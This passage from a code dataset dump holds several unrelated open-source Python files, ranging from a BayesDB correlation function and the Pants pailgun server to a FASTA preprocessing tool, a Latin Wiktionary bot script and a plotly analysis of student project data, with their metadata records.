Treat cyclic as numerical for the purpose of calculating correlation.\n    cctype_map = dict(normal_inverse_gamma = 'numerical', symmetric_dirichlet_discrete = 'categorical', vonmises = 'numerical')\n    cctype1 = cctype_map[M_c['column_metadata'][col1]['modeltype']]\n    cctype2 = cctype_map[M_c['column_metadata'][col2]['modeltype']]\n\n    correlation = numpy.nan\n    t_array = numpy.array(T, dtype=float)\n    nan_index = numpy.logical_or(numpy.isnan(t_array[:,col1]), numpy.isnan(t_array[:,col2]))\n    t_array = t_array[numpy.logical_not(nan_index),:]\n    n = t_array.shape[0]\n\n    if cctype1 == 'numerical' and cctype2 == 'numerical':\n        # Two numerical columns: Pearson R squared\n        correlation, p_value = pearsonr(t_array[:,col1], t_array[:,col2])\n        correlation = correlation ** 2\n    elif cctype1 == 'categorical' and cctype2 == 'categorical':\n        # Two categorical columns: Cramer's phi\n        data_i = numpy.array(t_array[:, col1], dtype='int32')\n        data_j = numpy.array(t_array[:, col2], dtype='int32')\n        unique_i = numpy.unique(data_i)\n        unique_j = numpy.unique(data_j)\n        min_levels = min(len(unique_i), len(unique_j))\n\n        if min_levels >= 2:\n            # Create contingency table - built-in way to do this?\n            contingency_table = numpy.zeros((len(unique_i), len(unique_j)), dtype='int')\n            for i in unique_i:\n                for j in unique_j:\n                    contingency_table[i][j] = numpy.logical_and(data_i == i, data_j == j).sum()\n\n            chisq, p, dof, expected = chi2_contingency(contingency_table, correction=False)\n            correlation = (chisq / (n * (min_levels - 1))) ** 0.5\n    else:\n        # One numerical, one categorical column: ANOVA R-squared\n        if cctype1 == 'categorical':\n            data_group = t_array[:, col1]\n            data_y = t_array[:, col2]\n        else:\n            data_group = t_array[:, col2]\n            data_y = t_array[:, col1]\n        group_values = numpy.unique(data_group)\n        n_groups = float(len(group_values))\n\n        if n > n_groups:\n            # Use scipy.stats.f_oneway to calculate F-statistic and p-value.\n            F, p = f_oneway(*[data_y[data_group == j] for j in group_values])\n            # Convert F-stat and number of groups into R-squared.\n            correlation = 1 - (1 + F * ((n_groups - 1) / (n - n_groups))) ** -1\n\n    return correlation\n", "sub_path": "bayesdb/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 10404, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.isnan", "line_number": 60, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.infer", "line_number": 66, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 70, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 73, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 82, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 99, "usage_type": "call"}, {"api_name": "data_utils.convert_value_to_code", "line_number": 115, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 142, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", 
"line_number": 187, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.stats.chi2_contingency", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 220, "usage_type": "call"}, {"api_name": "scipy.stats.f_oneway", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "619377649", "text": "# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport socket\nimport traceback\n\nfrom six.moves.socketserver import BaseRequestHandler, BaseServer, TCPServer\n\nfrom pants.java.nailgun_protocol import NailgunProtocol\nfrom pants.util.contextutil import maybe_profiled\nfrom pants.util.socket import RecvBufferedSocket, safe_select\n\n\nclass PailgunHandlerBase(BaseRequestHandler):\n \"\"\"Base class for nailgun protocol handlers for use with SocketServer-based servers.\"\"\"\n\n def __init__(self, request, client_address, server):\n \"\"\"Override of BaseRequestHandler.__init__() that defers calling of self.setup().\n\n :param socket request: The inbound TCPServer request socket.\n :param tuple client_address: The remote client socket address tuple (host, port).\n :param TCPServer server: The parent TCPServer instance.\n \"\"\"\n self.request = request\n self.client_address = client_address\n self.server = server\n self.logger = logging.getLogger(__name__)\n\n def handle_request(self):\n \"\"\"Handle a request (the equivalent of the latter half of BaseRequestHandler.__init__()).\n\n This is invoked by a TCPServer subclass that overrides process_request().\n \"\"\"\n self.setup()\n try:\n self.handle()\n finally:\n self.finish()\n\n def handle(self):\n \"\"\"Main request handler entrypoint for subclasses.\"\"\"\n\n def handle_error(self, exc):\n \"\"\"Main error handler entrypoint for subclasses.\"\"\"\n\n\nclass PailgunHandler(PailgunHandlerBase):\n \"\"\"A nailgun protocol handler for use with forking, SocketServer-based servers.\"\"\"\n\n def _run_pants(self, sock, arguments, environment):\n \"\"\"Execute a given run with a pants runner.\"\"\"\n runner = self.server.runner_factory(sock, arguments, environment)\n runner.run()\n\n def handle(self):\n \"\"\"Request handler for a single Pailgun request.\"\"\"\n # Parse the Nailgun request portion.\n _, _, arguments, environment = NailgunProtocol.parse_request(self.request)\n\n # N.B. the first and second nailgun request arguments (working_dir and command) are currently\n # ignored in favor of a get_buildroot() call within LocalPantsRunner.run() and an assumption\n # that anyone connecting to this nailgun server always intends to run pants itself.\n\n # Prepend the command to our arguments so it aligns with the expected sys.argv format of python\n # (e.g. 
['list', '::'] -> ['./pants', 'list', '::']).\n    arguments.insert(0, './pants')\n\n    self.logger.info('handling pailgun request: `{}`'.format(' '.join(arguments)))\n    self.logger.debug('pailgun request environment: %s', environment)\n\n    # Execute the requested command with optional daemon-side profiling.\n    with maybe_profiled(environment.get('PANTSD_PROFILE')):\n      self._run_pants(self.request, arguments, environment)\n\n  def handle_error(self, exc=None):\n    \"\"\"Error handler for failed calls to handle().\"\"\"\n    if exc:\n      NailgunProtocol.send_stderr(self.request, traceback.format_exc())\n    NailgunProtocol.send_exit(self.request, '1')\n\n\nclass PailgunServer(TCPServer):\n  \"\"\"A (forking) pants nailgun server.\"\"\"\n\n  def __init__(self, server_address, runner_factory, lifecycle_lock,\n               handler_class=None, bind_and_activate=True):\n    \"\"\"Override of TCPServer.__init__().\n\n    N.B. the majority of this function is copied verbatim from TCPServer.__init__().\n\n    :param tuple server_address: An address tuple of (hostname, port) for socket.bind().\n    :param class runner_factory: A factory function for creating a DaemonPantsRunner for each run.\n    :param threading.RLock lifecycle_lock: A lock used to guard against abrupt teardown of the server's\n                                           execution thread during handling. All pailgun request handling\n                                           will take place under care of this lock, which would be shared with\n                                           a `PailgunServer`-external lifecycle manager to guard teardown.\n    :param class handler_class: The request handler class to use for each request. (Optional)\n    :param bool bind_and_activate: If True, binds and activates networking at __init__ time.\n                                   (Optional)\n    \"\"\"\n    # Old-style class, so we must invoke __init__() this way.\n    BaseServer.__init__(self, server_address, handler_class or PailgunHandler)\n    self.socket = RecvBufferedSocket(socket.socket(self.address_family, self.socket_type))\n    self.runner_factory = runner_factory\n    self.lifecycle_lock = lifecycle_lock\n    self.allow_reuse_address = True           # Allow quick reuse of TCP_WAIT sockets.\n    self.server_port = None                   # Set during server_bind() once the port is bound.\n\n    if bind_and_activate:\n      try:\n        self.server_bind()\n        self.server_activate()\n      except Exception:\n        self.server_close()\n        raise\n\n  def server_bind(self):\n    \"\"\"Override of TCPServer.server_bind() that tracks bind-time assigned random ports.\"\"\"\n    TCPServer.server_bind(self)\n    _, self.server_port = self.socket.getsockname()[:2]\n\n  def handle_request(self):\n    \"\"\"Override of TCPServer.handle_request() that provides locking.\n\n    N.B. 
Most of this is copied verbatim from SocketServer.py in the stdlib.\n \"\"\"\n timeout = self.socket.gettimeout()\n if timeout is None:\n timeout = self.timeout\n elif self.timeout is not None:\n timeout = min(timeout, self.timeout)\n fd_sets = safe_select([self], [], [], timeout)\n if not fd_sets[0]:\n self.handle_timeout()\n return\n\n # After select tells us we can safely accept, guard the accept and request\n # handling with the lifecycle lock to avoid abrupt teardown mid-request.\n with self.lifecycle_lock():\n self._handle_request_noblock()\n\n def process_request(self, request, client_address):\n \"\"\"Override of TCPServer.process_request() that provides for forking request handlers and\n delegates error handling to the request handler.\"\"\"\n # Instantiate the request handler.\n handler = self.RequestHandlerClass(request, client_address, self)\n try:\n # Attempt to handle a request with the handler.\n handler.handle_request()\n except Exception as e:\n # If that fails, (synchronously) handle the error with the error handler sans-fork.\n try:\n handler.handle_error(e)\n finally:\n # Shutdown the socket since we don't expect a fork() in the exception context.\n self.shutdown_request(request)\n else:\n # At this point, we expect a fork() has taken place - the parent side will return, and so we\n # close the request here from the parent without explicitly shutting down the socket. The\n # child half of this will perform an os._exit() before it gets to this point and is also\n # responsible for shutdown and closing of the socket when its execution is complete.\n self.close_request(request)\n", "sub_path": "src/python/pants/pantsd/pailgun_server.py", "file_name": "pailgun_server.py", "file_ext": "py", "file_size_in_byte": 7140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "six.moves.socketserver.BaseRequestHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.parse_request", "line_number": 63, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 63, "usage_type": "name"}, {"api_name": "pants.util.contextutil.maybe_profiled", "line_number": 77, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.send_stderr", "line_number": 83, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 83, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 83, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.send_exit", "line_number": 84, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 84, "usage_type": "name"}, {"api_name": "six.moves.socketserver.TCPServer", "line_number": 87, "usage_type": "name"}, {"api_name": "six.moves.socketserver.BaseServer.__init__", "line_number": 107, "usage_type": "call"}, {"api_name": "six.moves.socketserver.BaseServer", "line_number": 107, "usage_type": "name"}, {"api_name": "pants.util.socket.RecvBufferedSocket", "line_number": 108, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 108, "usage_type": "call"}, {"api_name": "six.moves.socketserver.TCPServer.server_bind", "line_number": 124, "usage_type": "call"}, {"api_name": "six.moves.socketserver.TCPServer", "line_number": 124, "usage_type": "name"}, {"api_name": 
"pants.util.socket.safe_select", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "302730534", "text": "\n# Copyright 2016 RIFT.IO Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport asyncio\nimport time\nfrom collections import defaultdict\n\nfrom enum import Enum\n\nfrom gi.repository import NsdYang, NsrYang, RwDts\nimport rift.tasklets\n\n\nclass ScalingGroupIndexExists(Exception):\n pass\n\n\nclass ScaleGroupTrigger(Enum):\n \"\"\" Trigger for scaling config \"\"\"\n PRE_SCALE_IN = 1\n POST_SCALE_IN = 2\n PRE_SCALE_OUT = 3\n POST_SCALE_OUT = 4\n\n\nclass ScaleGroupState(Enum):\n \"\"\" Scaling group state \"\"\"\n RUNNING = 1\n SCALING_IN = 2\n SCALING_OUT = 3\n\n\nclass ScalingGroup(object):\n \"\"\" This represents a configured NSR scaling group \"\"\"\n def __init__(self, log, group_msg):\n \"\"\" Create a ScalingGroup instance\n\n This class is responsible for representing a configured scaling group\n which is present within an NSR.\n\n :param log: A logger instance\n :param group_msg: A NSD scaling group pb message\n \"\"\"\n self._log = log\n self._group_msg = group_msg\n\n self._instances = {}\n\n def __str__(self):\n return \"ScalingGroup(%s)\" % self.name\n\n @property\n def name(self):\n \"\"\" Name of the scaling group \"\"\"\n return self._group_msg.name\n\n @property\n def state(self):\n \"\"\" State of the scaling group \"\"\"\n state = ScaleGroupState.RUNNING\n for instance in self._instances.values():\n if instance.operational_status in [\"init\", \"vnf_init_phase\"]:\n self._log.debug(\"Scaling instance %s in scaling-out state: %s\",\n instance, instance.operational_status)\n state = ScaleGroupState.SCALING_OUT\n\n elif instance.operational_status in [\"terminate\", \"vnf_terminate_phase\"]:\n self._log.debug(\"Scaling instance %s in scaling-in state: %s\",\n instance, instance.operational_status)\n state = ScaleGroupState.SCALING_IN\n\n return state\n\n @property\n def vnf_index_count_map(self):\n \"\"\" The mapping of member_vnf_index_ref to count\"\"\"\n return {mbr.member_vnf_index_ref: mbr.count for mbr in self._group_msg.vnfd_member}\n\n @property\n def group_msg(self):\n \"\"\" Return the scale group PB message \"\"\"\n return self._group_msg\n\n @property\n def min_instance_count(self):\n \"\"\" Minimum (and default) number of instance of the scaling group \"\"\"\n return self._group_msg.min_instance_count\n\n @property\n def max_instance_count(self):\n \"\"\" Maximum number of instance of the scaling group \"\"\"\n return self._group_msg.max_instance_count\n\n def create_record_msg(self):\n \"\"\" Returns a NSR Scaling group record \"\"\"\n msg = NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord(\n scaling_group_name_ref=self.name,\n )\n\n for instance in self.instances:\n msg.instance.append(instance.create_record_msg())\n\n return msg\n\n @property\n def instances(self):\n return self._instances.values()\n\n def get_instance(self, instance_id):\n \"\"\" Get a scaling group instance\n\n :param instance_id: The instance's 
instance_id\n \"\"\"\n return self._instances[instance_id]\n\n def create_instance(self, instance_id, is_default=False):\n \"\"\" Create a scaling group instance\n\n :param instance_id: The new instance's instance_id\n \"\"\"\n self._log.debug(\"Creating %s instance instance_id %s \", self, instance_id)\n\n if instance_id in self._instances:\n raise ScalingGroupIndexExists(\"%s instance_id %s already exists\" % (self, instance_id))\n\n instance = ScalingGroupInstance(\n log=self._log,\n group_name=self.name,\n instance_id=instance_id,\n is_default=is_default,\n )\n\n self._instances[instance_id] = instance\n\n return instance\n\n def delete_instance(self, instance_id):\n self._log.debug(\"Deleting %s instance instance_id %s \", self, instance_id)\n del self._instances[instance_id]\n\n def trigger_map(self, trigger):\n trig_map = {\n NsdYang.ScalingTrigger.PRE_SCALE_IN : 'pre_scale_in',\n NsdYang.ScalingTrigger.POST_SCALE_IN : 'post_scale_in',\n NsdYang.ScalingTrigger.PRE_SCALE_OUT : 'pre_scale_out',\n NsdYang.ScalingTrigger.POST_SCALE_OUT : 'post_scale_out',\n }\n\n try:\n return trig_map[trigger]\n except Exception as e:\n self._log.error(\"Unknown scaling group trigger passed: {}\".format(trigger))\n self._log.exception(e)\n\n def trigger_config(self, trigger):\n \"\"\" Get the config action for the trigger \"\"\"\n self._log.debug(\"Trigger config {}: {}\".format(trigger, self._group_msg))\n trig = self.trigger_map(trigger)\n if trig is None:\n return\n\n for config in self._group_msg.scaling_config_action:\n if trig == config.trigger:\n return config\n\n\nclass ScalingGroupInstance(object):\n \"\"\" This class represents a configured NSR Scaling Group instance\"\"\"\n\n valid_status_list = (\n \"init\",\n \"vnf_init_phase\",\n \"running\",\n \"terminate\",\n \"vnf_terminate_phase\",\n \"terminated\",\n \"failed\",\n )\n\n def __init__(self, log, group_name, instance_id, is_default=False):\n self._log = log\n self._group_name = group_name\n self._instance_id = instance_id\n self._is_default = is_default\n\n self._vnfrs = {}\n\n self._create_time = int(time.time())\n self._op_status = \"init\"\n\n def __str__(self):\n return \"ScalingGroupInstance(%s #%s)\" % (self._group_name, self.instance_id)\n\n @property\n def operational_status(self):\n return self._op_status\n\n @operational_status.setter\n def operational_status(self, op_status):\n if op_status not in ScalingGroupInstance.valid_status_list:\n raise ValueError(\"Invalid scaling group instance status: %s\", op_status)\n\n self._op_status = op_status\n\n @property\n def instance_id(self):\n return self._instance_id\n\n @property\n def is_default(self):\n return self._is_default\n\n @property\n def vnfrs(self):\n \"\"\" Return all VirtualNetworkFunctionRecord's that have been added\"\"\"\n return self._vnfrs.values()\n\n def create_record_msg(self):\n msg = NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord_Instance(\n instance_id=self._instance_id,\n create_time=self._create_time,\n op_status=self._op_status,\n is_default=self._is_default\n )\n\n for vnfr in self.vnfrs:\n msg.vnfrs.append(vnfr.id)\n\n return msg\n\n def add_vnfr(self, vnfr):\n \"\"\" Add a VirtualNetworkFunctionRecord\"\"\"\n self._log.debug(\"Added %s to %s\", vnfr, self)\n self._vnfrs[vnfr.id] = vnfr", "sub_path": "modules/core/mano/rwlaunchpad/plugins/rwnsm/rift/tasklets/rwnsmtasklet/scale_group.py", "file_name": "scale_group.py", "file_ext": "py", "file_size_in_byte": 7551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "14", "api": [{"api_name": "enum.Enum", "line_number": 30, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 38, "usage_type": "name"}, {"api_name": "gi.repository.NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord", "line_number": 108, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang", "line_number": 108, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 155, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 155, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 157, "usage_type": "name"}, {"api_name": "gi.repository.NsdYang.ScalingTrigger", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.NsdYang", "line_number": 158, "usage_type": "name"}, {"api_name": "time.time", "line_number": 200, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang.YangData_Nsr_NsInstanceOpdata_Nsr_ScalingGroupRecord_Instance", "line_number": 231, "usage_type": "call"}, {"api_name": "gi.repository.NsrYang", "line_number": 231, "usage_type": "name"}]} +{"seq_id": "145556452", "text": "from pathlib import Path\nimport time\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--reference', '-r', type=str, required=True,\n help='Relative or absolute path to the folder containing\\\n one or multiple reference fasta files')\nparser.add_argument('--outfile', '-out', type=str, default='.',\n help='Specify absolute or relative path to output directory, default = .')\nargs = parser.parse_args()\n\n\n# preparing files and folders\nts = time.time()\n\np = Path(args.outfile)\nref_files = Path(args.reference)\n\noutput_folder = Path(f'{p}', 'results', 'preprocessed_references', f'{ts}')\noutput_folder.mkdir(parents=True, exist_ok=True)\n\n# processing formated outputs\nfor reference in ref_files.glob('*.fa*'):\n name = ''\n header = ''\n sequence = ''\n with open(reference) as f:\n ref_path = Path(reference)\n name = ref_path.stem\n lines = f.readlines()\n for i, line in enumerate(lines):\n if i < len(lines)-1:\n if line.startswith('>'):\n header += line.strip()\n else:\n sequence += line.strip()\n else:\n sequence += line.strip()\n\n output_file_path = output_folder / f'{name}.fasta'\n with output_file_path.open(\"w\", encoding=\"utf-8\") as of:\n of.write(f'>{header}\\n')\n of.write(f'{sequence}')", "sub_path": "tools/fasta_prepr/fasta_multiline_to_singleline.py", "file_name": "fasta_multiline_to_singleline.py", "file_ext": "py", "file_size_in_byte": 1380, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 21, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "45385437", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib 
import getparam, rmparam, tname, msg, site\n\nimport lalib\n\ndef investigate_possible_adj(index, adj_pagename, adv, adv_defns):\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, adj_pagename, txt))\n pagemsg(\"Trying for adverb %s\" % adv)\n page = pywikibot.Page(site, adj_pagename)\n if not page.exists():\n pagemsg(\"Doesn't exist for adverb %s\" % adv)\n return\n\n text = str(page.text)\n\n retval = lalib.find_latin_section(text, pagemsg)\n if retval is None:\n return\n\n sections, j, secbody, sectail, has_non_latin = retval\n\n subsections = re.split(\"(^===+[^=\\n]+===+\\n)\", secbody, 0, re.M)\n\n for k in range(2, len(subsections), 2):\n parsed = blib.parse_text(subsections[k])\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn in [\"la-adj\", \"la-part\"]:\n adj = lalib.la_get_headword_from_template(t, adj_pagename, pagemsg)[0]\n adj_defns = lalib.find_defns(subsections[k])\n msg(\"%s /// %s /// %s /// %s\" % (adv, adj, \";\".join(adv_defns), \";\".join(adj_defns)))\n\ndef process_page(page, index):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n notes = []\n\n if \" \" in pagetitle:\n pagemsg(\"WARNING: Space in page title, skipping\")\n return\n pagemsg(\"Processing\")\n\n text = str(page.text)\n\n retval = lalib.find_latin_section(text, pagemsg)\n if retval is None:\n return\n\n sections, j, secbody, sectail, has_non_latin = retval\n\n subsections = re.split(\"(^===+[^=\\n]+===+\\n)\", secbody, 0, re.M)\n\n for k in range(2, len(subsections), 2):\n parsed = blib.parse_text(subsections[k])\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn == \"la-adv\":\n adv = blib.remove_links(getparam(t, \"1\")) or pagetitle\n macron_stem, is_stem = lalib.infer_adv_stem(adv)\n if not is_stem:\n pagemsg(\"WARNING: Couldn't infer stem from adverb %s, not standard: %s\" % (\n adv, origt))\n continue\n adv_defns = lalib.find_defns(subsections[k])\n possible_adjs = []\n stem = lalib.remove_macrons(macron_stem)\n possible_adjs.append(stem + \"us\")\n possible_adjs.append(stem + \"is\")\n if stem.endswith(\"nt\"):\n possible_adjs.append(stem[:-2] + \"ns\")\n if stem.endswith(\"plic\"):\n possible_adjs.append(stem[:-2] + \"ex\")\n if stem.endswith(\"c\"):\n possible_adjs.append(stem[:-1] + \"x\")\n if re.search(\"[aeiou]r$\", stem):\n possible_adjs.append(stem)\n elif stem.endswith(\"r\"):\n possible_adjs.append(stem[:-1] + \"er\")\n if adv.endswith(\"iē\"):\n possible_adjs.append(stem + \"ius\")\n for possible_adj in possible_adjs:\n investigate_possible_adj(index, possible_adj, adv, adv_defns)\n\nparser = blib.create_argparser(\"Find corresponding adjectives for Latin adverbs\",\n include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page,\n default_cats=[\"Latin adverbs\"])\n", "sub_path": "find_latin_adj_for_adv.py", "file_name": "find_latin_adj_for_adv.py", "file_ext": "py", "file_size_in_byte": 3204, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "blib.msg", "line_number": 13, "usage_type": "call"}, {"api_name": "pywikibot.Page", "line_number": 15, "usage_type": "call"}, {"api_name": "blib.site", "line_number": 15, "usage_type": "argument"}, {"api_name": "lalib.find_latin_section", "line_number": 22, "usage_type": "call"}, {"api_name": "re.split", "line_number": 28, "usage_type": "call"}, 
{"api_name": "re.M", "line_number": 28, "usage_type": "attribute"}, {"api_name": "blib.parse_text", "line_number": 31, "usage_type": "call"}, {"api_name": "blib.tname", "line_number": 34, "usage_type": "call"}, {"api_name": "lalib.la_get_headword_from_template", "line_number": 36, "usage_type": "call"}, {"api_name": "lalib.find_defns", "line_number": 37, "usage_type": "call"}, {"api_name": "blib.msg", "line_number": 38, "usage_type": "call"}, {"api_name": "blib.msg", "line_number": 43, "usage_type": "call"}, {"api_name": "lalib.find_latin_section", "line_number": 54, "usage_type": "call"}, {"api_name": "re.split", "line_number": 60, "usage_type": "call"}, {"api_name": "re.M", "line_number": 60, "usage_type": "attribute"}, {"api_name": "blib.parse_text", "line_number": 63, "usage_type": "call"}, {"api_name": "blib.tname", "line_number": 66, "usage_type": "call"}, {"api_name": "blib.remove_links", "line_number": 68, "usage_type": "call"}, {"api_name": "blib.getparam", "line_number": 68, "usage_type": "call"}, {"api_name": "lalib.infer_adv_stem", "line_number": 69, "usage_type": "call"}, {"api_name": "lalib.find_defns", "line_number": 74, "usage_type": "call"}, {"api_name": "lalib.remove_macrons", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 85, "usage_type": "call"}, {"api_name": "blib.create_argparser", "line_number": 94, "usage_type": "call"}, {"api_name": "blib.parse_start_end", "line_number": 97, "usage_type": "call"}, {"api_name": "blib.do_pagefile_cats_refs", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "591944643", "text": "from plotly.graph_objs import Scatter, Layout\nimport plotly\nimport plotly.offline as py\nimport numpy as np\nimport plotly.graph_objs as go\nimport jieba.analyse\nfrom matplotlib import pyplot as plt\nfrom wordcloud import WordCloud\nfrom PIL import Image\nimport re\n\nfrom db_util import get_data, execute\n\n\ndef analyse_academy():\n sql_academy = \"SELECT student_major, COUNT(*) from project GROUP BY student_major ORDER BY COUNT(*) DESC\"\n academy_data = execute(sql_academy)\n academy_dict = {}\n for index in range(len(academy_data)):\n name = academy_data[index][0]\n value = academy_data[index][1]\n academy_dict[name] = value\n trace0 = go.Bar(\n x= list(academy_dict.keys()),\n y= list(academy_dict.values()),\n name = '毕业人数',\n marker = dict(\n color = 'rgb(0,229,238)'\n )\n )\n sql_male = \"SELECT student_major, COUNT(*) from project WHERE student_gender = '男' GROUP BY student_major ORDER BY COUNT(*) DESC\"\n male_data = execute(sql_male)\n male_dict = {}\n for index in range(len(male_data)):\n name = male_data[index][0]\n value = male_data[index][1]\n male_dict[name] = value\n trace1 = go.Bar(\n x= list(male_dict.keys()),\n y= list(male_dict.values()),\n name = '男生人数',\n marker = dict(\n color = 'rgb(255,185, 15)'\n )\n )\n sql_female = \"SELECT student_major, COUNT(*) from project WHERE student_gender = '女' GROUP BY student_major ORDER BY COUNT(*) DESC\"\n female_data = execute(sql_female)\n female_dict = {}\n for index in range(len(female_data)):\n name = female_data[index][0]\n value = female_data[index][1]\n female_dict[name] = value\n trace2 = go.Bar(\n x=list(female_dict.keys()),\n y=list(female_dict.values()),\n name='女生人数',\n marker=dict(\n color='rgb(255,69,0)'\n )\n )\n data = [trace0, trace1, trace2]\n py.plot(data)\n return None\n\ndef analyse_project_teacher():\n sql = \"SELECT teacher_name, COUNT(*) from project GROUP BY teacher_name ORDER BY COUNT(*) DESC\"\n teacher_data = execute(sql)[0:20]\n 
teacher_dict = {}\n    for index in range(len(teacher_data)):\n        name = teacher_data[index][0]\n        value = teacher_data[index][1]\n        teacher_dict[name] = value\n    trace0 = go.Bar(\n        x=list(teacher_dict.keys()),\n        y=list(teacher_dict.values()),\n        name='指导人数',\n        marker=dict(\n            color='rgb(100,149,237)'\n        )\n    )\n    data = [trace0]\n    py.plot(data)\n    return None\n\ndef analyse_project_student_name():\n    sql = \"SELECT student_name, COUNT(*) from project GROUP BY student_name ORDER BY COUNT(*) DESC LIMIT 68\"\n    student_name_data = execute(sql)\n    student_name_dict = {}\n    for index in range(len(student_name_data)):\n        name = student_name_data[index][0]\n        value = student_name_data[index][1]\n        student_name_dict[name] = value\n\n    male_dict = {}\n    female_dict = {}\n    for name in student_name_dict.keys():\n        sql_male = \"SELECT COUNT(*) from project WHERE student_name = %s AND student_gender = '男'\" % (\"'\"+name+\"'\")\n        sql_female = \"SELECT COUNT(*) from project WHERE student_name = %s AND student_gender = '女'\" % (\"'\"+name+\"'\")\n        male_data = execute(sql_male)\n        female_data = execute(sql_female)\n        male_dict[name] = male_data[0][0]\n        female_dict[name] = female_data[0][0]\n\n    trace0 = go.Bar(\n        x=list(male_dict.keys()),\n        y=list(male_dict.values()),\n        name='男',\n        marker=dict(\n            color='rgb(100,149,237)'\n        )\n    )\n\n    trace1 = go.Bar(\n        x=list(female_dict.keys()),\n        y=list(female_dict.values()),\n        name='女',\n        marker=dict(\n            color='rgb(238,44,44)'\n        )\n    )\n\n    data = [trace0,trace1]\n    layout = go.Layout(\n        barmode='stack'\n    )\n    